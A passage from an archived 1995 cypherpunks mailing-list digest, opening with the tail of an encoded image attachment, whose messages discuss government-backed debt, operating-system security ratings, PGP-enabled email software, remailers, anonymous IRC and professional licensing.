ABQCxgAjAAUAAAATAsYAYwEEAAAALQEDAAkAAAAdBiEA8AABAEABxgAjAAQA
AAAtAQIABQAAABQC3AAjAAUAAAATAtwAYwEEAAAALQEDAAkAAAAdBiEA8AAB
AEAB3AAjAAQAAAAtAQIABQAAABQCFwByAAUAAAATAt0AcgAEAAAALQEDAAkA
AAAdBiEA8ADGAAEAFwByAAQAAAAtAQIABQAAABQCFwDCAAUAAAATAt0AwgAE
AAAALQEDAAkAAAAdBiEA8ADGAAEAFwDCAAQAAAAtAQIABQAAABQCFwASAQUA
AAATAt0AEgEEAAAALQEDAAkAAAAdBiEA8ADGAAEAFwASAQQAAAAtAQIABQAA
ABQCFwBiAQUAAAATAt0AYgEEAAAALQEDAAkAAAAdBiEA8ADGAAEAFwBiAQQA
AAAtAQQABAAAACcB//8DAAAAHgAEAAAALQEFAAUAAAABAsDAwAAFAAAACQLA
wMAABwAAABYE3QBjAQEAAQAQAAAA+wLv/wAAAAAAALwCAAAAAAAAAABBcmlh
bAACAAQAAAAtAQYABQAAAAkCAAAAAAQAAAAEAQ0ABAAAAAIBAQANAAAAMgoD
ACYAAQAGAAMAAwAiABYAIAAEAAcAAAD8AgAAgICAAAAABAAAAC0BBwAFAAAA
CQKAgIAABQAAAAEC////AAQAAAACAQIABAAAAPABAgAIAAAA+gIAAAAAAACA
gIAABAAAAC0BAgAFAAAAFAIVAAIABQAAABMCFQAiAAQAAAAtAQMACQAAAB0G
IQDwAAEAIAAVAAIABAAAAC0BAgAFAAAAFAICACEABQAAABMCFQAhAAQAAAAt
AQMACQAAAB0GIQDwABMAAQACACEABAAAAC0BAgAFAAAAFAIUAAMABQAAABMC
FAAiAAQAAAAtAQMACQAAAB0GIQDwAAEAHwAUAAMABAAAAC0BAgAFAAAAFAID
ACAABQAAABMCFgAgAAQAAAAtAQMACQAAAB0GIQDwABMAAQADACAABAAAAC0B
AQAEAAAALQEGAAUAAAAJAgAAAAAFAAAAAQLAwMAABAAAAAIBAQANAAAAMgoZ
AA0AAQACAAIAGAAiACwAMQAJAA0AAAAyCi8ADQABAAIAAgAuACIAQgAyAAkA
DQAAADIKRQANAAEAAgACAEQAIgBYADMACQANAAAAMgpbAA0AAQACAAIAWgAi
AG4ANAAJAA0AAAAyCnEADQABAAIAAgBwACIAhAA1AAkADQAAADIKhwANAAEA
AgACAIYAIgCaADYACQANAAAAMgqdAA0AAQACAAIAnAAiALAANwAJAA0AAAAy
CrMADQABAAIAAgCyACIAxgA4AAkADQAAADIKyQANAAEAAgACAMgAIgDcADkA
CQANAAAAMgoDAEUAAQACACQAAgByABYAQQALAA0AAAAyCgMAlQABAAIAdAAC
AMIAFgBCAAwADQAAADIKAwDlAAEAAgDEAAIAEgEWAEMADAANAAAAMgoDADUB
AQACABQBAgBiARYARAAMABAAAAD7AhQACQAAAAAAvAIAAAAAAQICIlN5c3Rl
bQAGBAAAAC0BCAAEAAAAJwH//wMAAAAeAAQAAAAtAQYABQAAAAECwMDAAAUA
AAAJAgAAAAAHAAAAFgTdAGMBFwAjABAAAAD7Au//AAAAAAAAkAEAAAAAAAAA
AEFyaWFsAAIABAAAAC0BCQAFAAAAAQL///8ABAAAAAQBDQAEAAAAAgEBAA==
--Boundary..3925.1071713475.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 24 Jan 95 16:15:40 PST
To: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501231119.A585123998-0100000@umiami.ir.miami.edu>
Message-ID: <9501250013.AA19202@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 23 Jan 1995 12:05:22 -0500 (EST)
    From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
    
    Sallie Mae's commercial paper is NOT backed by the full 
    faith and credit of the US government.  They carry a specific disclaimer 
    to that effect.  It is true that many personal student loans (GSLs) from 
    banks are guaranteed by the government.  The system was recently reformed 
    to remove the riskless subsidy to Sallie Mae, which is 100% privately 
    owned, and very profitable.
    
    Similarly Fannie Mae and all other priavetly held GSE's are only backed 
    by an "implicit" federal guarantee.  Although the only time one of these 
    got into trouble the feds did bail it out.

I inferred (perhaps erroneously) a tone of correction in your message.
For the record, GSLs and GNMA loans were the only loans which I
explicitly claimed were backed by the full faith and credit of the US
government.  Thank you for your clarification wrt Sallie Mae.

    On Mon, 23 Jan 1995, Rick Busdiecker wrote:
    [...]
    > Student Loans (at least GSLs) and GNMA loans are backed by ``the full
    > faith and credit'' of the US federal government.  As far as an
    > investor is concerned, loan default looks the same as if the loanee
    > paid their debt off early.  The `web of debt' suggestion posted here
    > doesn't seem to follow the same model unless you count virtually every
    > form of financial transaction -- including buying a cup of coffe with
    > a dollar bill -- as fitting the model.
    > 
    > As a side note, GNMA (Ginnie Mae) is not for `general loans', but
    > rather VA and FHA primary residence mortgages with various
    > restrictions.  GNMA, FNMA (Fannie Mae), and FHLMC (Freddie Mac) all
    > exist to provide secondary markets for various kinds of real estate
    > debt.
    [...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Tue, 24 Jan 95 17:28:17 PST
To: cypherpunks@toad.com
Subject: SMTP and Received: from fields
Message-ID: <v01510111ab4b4b5b4759@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As an SMTP sender, is there any way to strip the Received: from <place...>
out of the message headers?
TIA,
- -K

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyWbIEiLvmPjc4XdAQF4qQQAoLZVhiQn3QJGigmDzvkYvBeQ8gTjw/7L
/IHAGprT+e4Qj2TEXRoQyi6gycyRsZYF9QhnuflG6sEtE4V8i/Z079RQpewTY7YT
ZiTi8WhSxYBRTu3FbgxpXNRULsQubivrxbkK31tqT8jHXOu7r5T+eTt1X7Lvr/4d
KtBralO3QHc=
=/C96
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 3rd! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Tue, 24 Jan 95 19:39:13 PST
To: cypherpunks@toad.com
Subject: Re: Security of UNIX, NT, etc. (Was: Clinton Freezes...)
Message-ID: <9501250337.AB08493@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


James Donald writes:
> > At present it seems to me that unix machines on the internet
> > are intrinsicly insecure -- the methods used to secure them
> > are a collection of ad hoc patches.  For example all
> > unix machines are vulnerable to the trojan
> > horse attack.

Depends on what trojan horse attack you have in mind.
Well-designed B1-secure systems can get rid of most of the 
Trojan Horse attacks by storing the trusted computing base
System Low and requiring root to only execute programs at that level, 
and running all users at higher classifications, like Unclassified.
Since users can't write down, they can't hack the TCB, 
so the main opportunity for Trojan Horses is to trick trusted programs
into interpreting data in dangerous ways (e.g. executable editor 
macros in email, or exploitation of a much smaller set of bugs
than usual.)

> > Windows NT is supposedly secure.
<ftp://sounds.sdsu.edu/somedir/evillaugh.au>

And Perry replies:

> NT is about as secure as VMS was, i.e. not at all. Its just got
> different bugs.

As is any system that was designed for purposes other than security
and had security added on.

(On VMS: The C2-rated VMS systems came out somewhat before the
Worms Against Nuclear Killers takeover of a NASA(?) network;
it seems that being rated C2 doesn't prevent you from shipping systems
with the factory-equipped SYSTEM and FIELD account passwords left alone.)

> > Certainly its design makes it possible to write software that is
> > intrinsicly secure, rather than creating a particular fix for each
> > particular hole.
> 
> You mean, it makes proof of security possible for real programs? 
> That there is a proof of security available for the NT kernel?
> I'd settle for a proof of non-crashing myself.  Short of that I'm
> unaware of any system that is "intrinsically" secure.

I thought there were systems at at least the B3 level, if not A1;
Honeywell SCOMP comes to mind.  Of course, all those levels are
just Orange Book, and extending genuinely provable multilevel security
to the multi-computer networked problem was far beyond current research
when I was last current on the stuff.  (They could update me,
but then they'd have to kill me :-).)  There was also KSOS, but I don't
remember what level of security it reached.

There have been B2-rated networks which let single-level machines share 
a LAN (Verdix VSLAN), and there's a certain level of security you can get
running uucp on B1 systems, but bug-free shared networked general-purpose
systems are, uh, not very common.  And didn't Boeing have a high-rated
fiber LAN of some sort?

Actually, before networking, MS-DOS was perfectly secure.  After all,
there's only one User in the universe, and She is allowed to do
anything She wants, however ill-advised....


		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 24 Jan 95 16:59:56 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Here's what will happen to U.S. based remailers
In-Reply-To: <Pine.SV4.3.91.950124161239.1512A-100000@mirage.skypoint.com>
Message-ID: <9501250054.AA19991@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 24 Jan 1995 16:15:20 -0600 (CST)
    From: Samuel Kaplin <skaplin@mirage.skypoint.com>
    
    On Tue, 24 Jan 1995, Lucky Green wrote:
    
    > Many years ago, I read a poem by a German priest
    
    Is this the poem, Lucky?
    
         They [Nazis] came first for the Communists,
    and I didn't speak up because I wasn't a Communist.
         Then they came for the Jews, 
    and I didn't speak up because I wasn't a Jew.
         Then they came for the Catholics, 
    and I didn't speak up because I was a Protestant.
         Then they came for me,
    and by that time there was no one left to speak up.
                             - Martin Niemller
    
Close.  You left out trade unionists and misspelled his last name, but
certainly got the bulk of it.  I'm typing from a pink triangular
button only because it's close by (pinned to my clinic escorting hat),
but I've previously verified that it matches the text from other
sources.  Of course, it may very well be a translation . . . .

I believe that Rishab Ghosh also sent an approximation of this text
out to the list a while back.

			Rick



	``In Germany they first came for the Communists, and I
	    didn't speak up because I wasn't a Communist.
	   Then they came for the Jews, and I didn't speak
	    up because I wasn't a Jew.  Then they came for
	      the trade unionists, and I didn't speak up
	       because I wasn't a trade unionist.  Then
		  they came for the Catholics, and I
		   didn't speak up because I was a
		   Protestant.  Then they came for
			me -- and by that time
			   no one was left
			    to speak up.''
				   
			      - Pastor
				Martin
			        Niemoller




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Tue, 24 Jan 95 18:02:56 PST
To: cypherpunks@toad.com
Subject: Windows email & pgp
Message-ID: <9501250203.AA00901@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

Yes, yet another WinSock E-mail program...

Lately, I have been trying out several mail programs for Windows, 
but have been sorely disappointed by their functionality. I was tired
of the annoying "please-send-me-money-now" windows popping up, programs 
that simply didn't work or worse, didn't work very well.
 
I have used many different mail programs on several platforms, and have 
yet to find one that I *really* like.  Elm would be the closest at this 
point, but it is annoying and time consuming to have to go through the 
pains of extracting a mail message, verifying signatures, etc.  As a
result, I have decided to write a SMPT mail program for Windows 3.x and
Windows NT (with WinSock) with PGP incorporated within it.

I felt that this is a great opportunity to spread the gospel about an 
undeniably practical use for encryption for the masses (sound familiar?),
somewhat in the vein that PGP was created by Zimmerman, and would like to 
solicit comments and/or suggestions for what to put in this program.  
Additionally, any guidance as to what steps I should take to obtain the
appropriate licenses, etc., to legally integrate PGP into a program of 
this type would be greatly appreciated.

Here are my specifications/criteria:
 
 - Perhaps most importantly, it should work.  It should: send, receive, 
   and forward mail messages; allow the user to delete and organize mail 
   messages into folder files; support signature files; support kill 
   files; pipe messages to a user-written application (like setting an 
   mail alias under UNIX).  Will support RFC821 and RFC822.  Forward 
   files must also be supported.

 - PGP will be included into the mail program itself, provided I can get 
   the appropriate permissions to legally do so.  The mail program will 
   automatically check for PGP keyblocks, encrypted messages, and 
   signatures.  Signatures will be automatically checked (unless 
   unfeasible) and the user alerted when a signature does not match.  
   The user will be prompted when keyblocks are in messages, to see if 
   the user would want to add them to his/her keyring.
 
 - List management.  Due to the high volume of the cypherpunks list, and 
   other lists, I have noticed that I have sometimes been neglected in 
   answering personal e-mail simply because it gets lost in the noise.  If 
   you are on a list, and configure it (i.e., signify the cypherpunks@toad.com 
   as a mail-list), every message from that list will be marked as such.  
   Mail from a List, but addressed to you from another user (the list is CC:d)
   will be marked accordingly too.  The idea here is to quickly highlight 
   messages that courtesy dictate you respond.  I was also thinking of a
   groupie/worship mode, but I think this is just too much.

 - Remailer.  This will take some more thought, but I would like to give
   the mail program the ability to forward messages and stomping on the 
   return address, etc., essentially creating a one way remailer.  Future 
   versions will support more, but this is a good start.

I believe that all of the above mentioned topics have been touched on 
before, but would like suggestions for this implementation.

This windows mail program will be released in the same spirit as PGP, 
free for academic and non-commercial use;  I will not beg for money 
(but thank-you's and admiration will be accepted as will helpful 
criticisms).  

I have already started hashing out the framework, but I will guestimate that
it will be roughly 15 weeks before anything usable is produced.  Beta testers
anyone?


-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQB1AwUBLyWv9M3mPt807UJ/AQEYOAL/eIhOy5IK0CmDKVl9Kp3lhTHEWmj2zpp1
kzEdD0Ktu4g2N4x+dvUyFEAkY5+mXh1IaexssoP5N7N7grO9NUnL7MST5DHCJQ12
P30DYvfCvPlAc4L41Wxp3pFS25mfI6Zz
=UJSx
-----END PGP SIGNATURE-----
-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for me PGP KEY; PGP encrypted mail very welcome. 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Date: Tue, 24 Jan 95 18:11:41 PST
To: cypherpunks@toad.com
Subject: anonymous IRC access....
Message-ID: <199501250211.VAA11047@blue.seas.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is there anyway to get anon irc access?  there used to be a way to get
it a couple of years ago but I can't find any ways to do it now....

sounds like a problem for cypherpunks..
------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
Engineering/Wharton           | ronmentalismTechnologyExtropianismElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 24 Jan 95 18:24:41 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: A Legal Web Page Issue
Message-ID: <9501250215.AA18153@eri>
MIME-Version: 1.0
Content-Type: text/plain


At 01:43 AM 1/23/95, "L. McCarthy" <lmccarth@ducie.cs.umass.edu> wrote:
> ...
>The text of the actual copyright notice seems to have a much friendlier slant.
>It resembles a GNU or FSF-type freeware license. Apparently you're just not
>allowed to charge *more* than a flat fee:
>
>- From the bottom of the cited Web page:
>"Copyright 1994 by Pepper & Corazzini, L.L.P. All rights reserved. 
>Reproduction is permitted so long as no charge is made for copies, no copies
>are placed on any electronic online service or database for which there is a
>fee other than a flat access charge, there is no alteration and this 
>copyright notice is included."

Is a link a copy?  Probably not.  This would only seem to apply to someone 
copying the page itself onto another server.  Whether an HTTP access counts 
as a copy is a bit dubious.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Tue, 24 Jan 95 18:59:23 PST
To: dave@esi.COM.AU (Dave Horsfall)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.SUN.3.91.950125124718.10006L-100000@eram.esi.com.au>
Message-ID: <9501250258.AA02633@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> On Tue, 24 Jan 1995, James A. Donald wrote:
> 
> > For example all unix machines are vulnerable to the trojan horse attack.
> 
> Ah, which one would this be?
>


The same one that causes airplanes to crash.  :-)

This was obviously a doofus statement and should be treated as such.

- paul

 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Tue, 24 Jan 95 21:04:43 PST
To: cypherpunks@toad.com
Subject: Re: LOCKSMITH'S GUILD WANTS L
Message-ID: <199501250503.VAA13311@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@netcom.com (Timothy C. May) wrote:

> Again, I'm not claiming anything about PGP making conventional doctors
> obsolete. Just the increased freedom of a wide range of services to be
> negotiated electronically, without benefit of official guild approvals.
>
> (This is an actual concern the professional organizations have. They worry
> about online medical diagnoses, about "unlicensed" consultants, and about
> data bases over which they have no jurisdiction.)

I certainly agree with your implication, that professional groups can
and sometimes do use licensing to restrain trade, with an eye toward
feathering their own nests.

But I don't buy your other implication, that it is a Good Thing to
unleash the unlicensed.  Licensing serves, or should serve, a public
good under the following conditions:  (a) consumers don't have the
information necessary to make an informed choice between professionals,
and (b) it is pretty fucking important that the job be done right.
Doesn't make any sense to license those who program video games.  DOES
make sense to license those who design skyscrapers.

Now, there are ways to alleviate the consumer's lack of knowledge.  In
my former racket (professional nursing), there is a lot of talk about
benchmarking:  comparing patient outcomes at different hospitals and
publicizing the results.  Market forces could then react to a nice,
measurable reputation.  But what about new, untested, solo
practitioners?  What about the architect whose buildings are all going
to fall down, ten years from now?  Even with well-publicized
reputations, the consumer doesn't have the necessary information to keep
from getting hurt.  In those circumstances, it's useful to have
standards, and a trusted public agency that certifies a person meets the
standards.

- --
______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyWC1xtumcu2AjihAQGnRAP/UYqpg7gUpAyt7CMHgAUSApGHi9AFOJON
UPns4os25F2B7op0uCdOQibbTJTUO5cjcDnpZ1VoYD00dFVN64IhoL/vYasoI1LV
xm/grDW2bd4NKfOIYvbdYYwp8/BxtvCp9p8fGNksmHyWBPV017qieEo2rTHxuOWM
lLwwSQYPp4o=
=TW+P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 24 Jan 95 10:54:05 PST
To: cypherpunks@toad.com
Subject: Australian Constitution (and more) on FTP
Message-ID: <gate.8iwgZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


dave@esi.com.au 
> Obviously - it's handy having an on-line copy of the Australian
> Constitution.  Anyone want a copy?  I don't run an FTP site.

I posted something to this effect ages ago:

ftp://wiretap.spies.com/Gov/World/australia.con

The same directory contains constitutions and charters of many countries,
from China to Slovakia, as well as the covenant of the Hamas, and the Magna 
Carta. Other useful data on Wiretap include various UN documents, international
charters and treaties, and loads of (particularly US, but also other) 
legislation.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 25 Jan 95 00:56:28 PST
To: Don Doumakes <doumakes@netcom.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <199501250503.VAA13311@netcom5.netcom.com>
Message-ID: <Pine.3.89.9501250003.A11561-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Don Doumakes wrote:
 
> But I don't buy your other implication, that it is a Good Thing to
> unleash the unlicensed.  Licensing serves, or should serve, a public
> good under the following conditions:  (a) consumers don't have the
> information necessary to make an informed choice between professionals,
> and ....

This assumes that governments have the necessary wisdom
to tell a bad architect from a good architect.   This does
not seem very plausible.

What most people would do is look at the certificate issued by
various certifying organizations  -- for example the doctores
university.

While universities often issue or refrain from issuing certificates
for corrupt and improper reasons, government supervision on this 
matter is unlikely to keep them honest --- indeed it is more likely
to force them to be dishonest, or to force them to deny their own
sound judgment in favor of arbitrary and foolish criteria imposed
by some ignorant and arrogant bureaucrat.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Wed, 25 Jan 95 01:21:47 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <Pine.3.89.9501250003.A11561-0100000@netcom6>
Message-ID: <Pine.SUN.3.91.950125011443.8597B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 25 Jan 1995, James A. Donald wrote:

> On Tue, 24 Jan 1995, Don Doumakes wrote:
>  
> > But I don't buy your other implication, that it is a Good Thing to
> > unleash the unlicensed.  Licensing serves, or should serve, a public
> > good under the following conditions:  (a) consumers don't have the
> > information necessary to make an informed choice between professionals,
> > and ....
> 
> This assumes that governments have the necessary wisdom
> to tell a bad architect from a good architect.   This does
> not seem very plausible.
> 
> What most people would do is look at the certificate issued by
> various certifying organizations  -- for example the doctores
> university.
> 
> While universities often issue or refrain from issuing certificates
> for corrupt and improper reasons, government supervision on this 
> matter is unlikely to keep them honest --- indeed it is more likely
> to force them to be dishonest, or to force them to deny their own
> sound judgment in favor of arbitrary and foolish criteria imposed
> by some ignorant and arrogant bureaucrat.
> 

So....once we get past what seems to be your utter refusal to consider 
the possibility that government could ever do anything right ....how do 
we ensure that those skyscrapers don't fall down on us?  That the surgeon 
who is going to open me up knows something about surgery?  That my money 
is at least somewhat safe in the bank?

If you are willing to trust your life to Adam Smith's 'invisible hand', 
then good luck to you.  I prefer to see the hand out on the table.

Charles Bell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Wed, 25 Jan 95 05:22:44 PST
To: cypherpunks@toad.com
Subject: looking for secondaries
Message-ID: <199501251321.HAA02783@jpunix.com>
MIME-Version: 1.0
Content-Type: text/x-pgp


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	Jpunix.com has applied for (but not yet received) the domain
name alias.net. Alias.net will be used for domain hiding by remailers.
What I need are some volunteers to provide secondary nameservice for
both alias.net and jpunix.com. Anyone want to voulunteer?

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyZP6lOTpEThrthvAQEnFwP/fp84eIZVVpoC3hHfoG3CO89GTovWRNli
M0c0sRMhvV8wrNbPOuyK11oY1XjcZfyjjWiSt7nt0q5yDB77FovFo5zxqNaS8mBr
+wSvBkB8/secyBrawFcgAejNF3orYHIguYiErOqMdC/V4hzNPIwTqhKuDNqtfyax
Mill1QwCnrg=
=RD9+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 25 Jan 95 08:42:32 PST
To: cypherpunks@toad.com
Subject: Re: e$: Guilds, Friedman, and Web-servers for mutual funds
In-Reply-To: <v01510101ab4bb4545cd9@[199.0.65.105]>
Message-ID: <199501251641.IAA23018@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: rah@shipwright.com (Robert Hettinga)

   You can sell anything digitable on the net.

   Securities are mostly traded on a book-entry
   basis, that is, in IBM mainframe(still!) computer accounting systems. The
   back offices are all automated. 

In the interest of buzzword-compliance, book entry securities in the
USA are called ADR's -- American Depository Receipts.  ADR facilities
are privately operated; Bank of New York has (if I'm remembering
correctly) the single largest share of this market.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Jan 95 06:24:53 PST
To: cypherpunks@toad.com
Subject: e$: Guilds, Friedman, and Web-servers for mutual funds
Message-ID: <v01510101ab4bb4545cd9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 1/24/95, Don Doumakes wrote:
>But I don't buy your other implication, that it is a Good Thing to
>unleash the unlicensed.

'Scuse me while I pound on scripture a bit.

I tend to concur with the esteemed Milton Friedman, who said, in summary,
that the primary benefits of any regulation, licensing regulation in
particular, accrue to the licensee. The people left standing after
regulation prices their competition out of the market tend to do very well
indeed.

There is a point here for cryptoanarchy, and I'll get to it in a minute.

Let's take the most hardened example of your point, and apply the logic of
Mr. Friedman, through the twisted filter of my logical processes, of
course. The poster child for this argument is of course, medicine. If, in
the late 19th century, the Food and Drug laws weren't passed, and the
guildification of the medical business didn't occur, what would medicine
look like today? I believe that the same scientific rigor would be applied
to the technology of medicine as has been done already. Too much money to
be made here finding real cures. Mobs would lynch/sue people who were
proven frauds by science and exposed as such in the press. So much for
licencing improving the "quality of practitioners".  I expect that medicine
would be less like Magick to us mere mundanes, and the apprentice/arcana
system that prevails may be in fact more subject to the laws of supply and
demand. In addition, if there weren't so many "rules" in the medical
business, the medical insurance business wouldn't be so non-competitive,
besides the inherent silliness of "insuring" a basic service like medicine.
Imagnine food insurance, or car repair insurance, patently uneconomic
"extended warrantees" notwithstanding.

OK. So what does this have to do with crypto. First, the whole
cryptoanarchic thing, which I include in this argument by fiat by pointing
to the Cyphernomicon: in this case, cryptodocs and their "Blade Runners"
(see Burroughs' book with the original title) will be able to practice
their trades with impunity, using regulatory arbitrage and outright
anonymity to defend themselves, relying on their success records with other
patients as their credentials. Second, instant settlement and electronic
commerce. With these tools you can buy any software (Video, Sound, Text,
Data) and their appropriate processing mechanisms from anywhere. You can
even buy "wetware" i.e. the time of an actual doc, and settle the trade
instantly.

Speaking of settling trades with guilds, I had something beat me over the
head while watching CSPAN's nth replay of October's "Networked Economy"
conference. (Tape number 48765, $35, CSPAN, 202-737-3220) As much of this
stuff as I try to read or see, I hadn't seen this before until about three
weeks ago. A comment made on a panel discussion by Scott Cook, the
president of Intuit (Quicken), and erst-while-Mrs. Bingamon's-not-looking
Vice President of Electronic Commerce at Microsoft, really got my
attention. He was on this panel with the president of Mosaic (now
Netscape), and the Prince of Darkness Himself (I think this was still
before the MS/Intuit merger announcement), among others.

To wit,

You can sell anything digitable on the net.

Now we know about doctors ;-), movies, songs, information feeds,
jokes-of-the-day, and software, but how about this: Financial Services.

Financial services? Sure, Mr. Cook says.  All we need is a little
"mainframe peristroika". Securities are mostly traded on a book-entry
basis, that is, in IBM mainframe(still!) computer accounting systems . The
back offices are all automated. So what about the people at the front of
the house? When you call up Fidelity and talk to a phone rep, what are you
doing? You're talking to someone on the phone who's punching what you want
into a computer for you.  You can do that yourself on any good
World-Wide-Web browser, all of which are forms-capable, and even secure,
now.

I've been doing consulting jobs with Fidelity off and on for a quite a few
years now.  I thought I knew where the people who would say "yes" to the
idea of web-publishing net-able information were. The same bunch had just
posted an opening for someone to go swing deals with the online services
(AOL, Compu$erve). So, I figure, how much could it possibly cost to hang a
web-server on the net with mutual fund blurbage, perspectuses, etc., on it.
A whole bunch less than it would take to negotiate and develop a
Fidelity-zone in AOL, yes?

Obviously, the next step would be to put up fund quotes, and then, when
secure-HTML and digital signatures work for real, the ability for people to
move their own money around by themselves.  They can do that now with a PIN
number and Fidelity's voice response system, so why not on a Web server
with NSA-proof security?

Someday, there may even be digital cash, or a reincarnated bearer security
business.  Chaum and others talk about anonymous voting schemes which make
great substrates for anonymous internet securities markets where anyone can
trade their securities without a stockbroker... Sound familiar, anyone?
Perry and Eric and I beat this to death six months ago or so. I took the
better part of the beating, if I remember...

So anyway, I went on a hunt for the bunch which was going to build
Fidelity's web-server. I found a huge mess of domain-name registrations
belonging to Fidelity. I found out that they have a T1 hooked up to
NearNet, that they had shown several people I know the pages they had for
Web server they're building, and it looks like they're bringing it online
real soon now, like a few weeks. Evidently, they've been there, done that,
or they're going to, anyway. Sigh.

Another new business idea bites the dust. Undaunted, maybe I should go to
Franklin/Templeton (Bahamas, anyone?), or Vanguard, or Pioneer, or Scudder,
and see if they're interested in keeping up with the Johnsons. :-).  Or
maybe not...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Wed, 25 Jan 95 06:39:41 PST
To: sameer <sameer@c2.org>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200105.RAA05837@infinity.c2.org>
